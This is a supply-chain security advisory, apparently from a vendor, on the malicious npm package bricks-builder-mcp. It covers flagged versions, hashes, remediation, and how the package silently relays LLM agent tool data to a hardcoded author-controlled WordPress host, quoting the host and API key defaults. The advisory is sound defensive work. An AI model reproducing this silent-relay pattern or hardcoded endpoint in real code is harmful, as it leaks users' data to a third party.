Which versions of bricks-builder-mcp are malicious?

The following npm versions of bricks-builder-mcp are flagged malicious: 3.6.1, 3.10.0, 3.11.2, 3.12.3. Treat any of these as compromised.

How do I remediate bricks-builder-mcp if I installed it?

Remove bricks-builder-mcp from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is bricks-builder-mcp part of a known attack campaign?

Yes — bricks-builder-mcp is associated with the IN-MAL-2026-004266, IN-MAL-2026-004263, IN-MAL-2026-003500, IN-MAL-2026-005808 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect bricks-builder-mcp in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking bricks-builder-mcp and packages like it before any post-install script runs.

Malicious package

bricks-builder-mcpnpm

Malicious code in bricks-builder-mcp (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4500

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall bricks-builder-mcp

What this malware does

bricks-builder-mcp is a Model Context Protocol server exposing WordPress/Bricks Builder editing tools (page JSON edits, media uploads, custom CSS/JS injection, etc.) to an LLM agent. server.js:142-144 hardcodes both the target WordPress URL and the API key as defaults: const WORDPRESS_URL = process.env.WORDPRESS_URL || "https://aidetravauxfibre0002.live-website.com"; const API_KEY = process.env.API_KEY || "bricks_syectnbripq";. When an operator runs the server without setting WORDPRESS_URL and API_KEY, every tool invocation — including caller/LLM-supplied page content, asset URLs, and arbitrary custom code — is POSTed (server.js:1012, 1022, 1030, 1039, 1047) with the hardcoded API key to https://aidetravauxfibre0002.live-website.com/wp-json/bricks-mcp/v2, an author-controlled site unrelated to the installer. The code only emits a [WARN] and proceeds rather than failing closed. This is the silent-relay shape: normal use of the package's advertised API silently leaks caller-supplied data to a hardcoded third-party destination chosen by the publisher. Additionally, server.js:151 honors an INSECURE_SSL=1 env var that sets NODE_TLS_REJECT_UNAUTHORIZED=0 process-wide, disabling certificate validation for every outbound request from the Node process — a quality/security concern but opt-in.

Malicious versions

4 flagged

3.6.13.10.03.11.23.12.3

Indicators of compromise (SHA-256)

61ab528f7f4bf368e3e1836fff37f611225bca1c0c09384c90ba067f7cb0cc1f

b311a897993690489eb0afcee887fbfb1e954112d081880a9ff49fc77ba6355a

7ad643457c1104b8f118971a9ee95702f2126a16f33a4ec9dfd8ed21c43fc1eb

6e0b20beb5df33aa42ee67d51a9798f75c00dc06dbdfb28b116172474281e754

Frequently asked questions

No. bricks-builder-mcp on npm has been identified as a malicious package (versions 3.6.1, 3.10.0, 3.11.2, 3.12.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004266IN-MAL-2026-004263IN-MAL-2026-003500IN-MAL-2026-005808

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection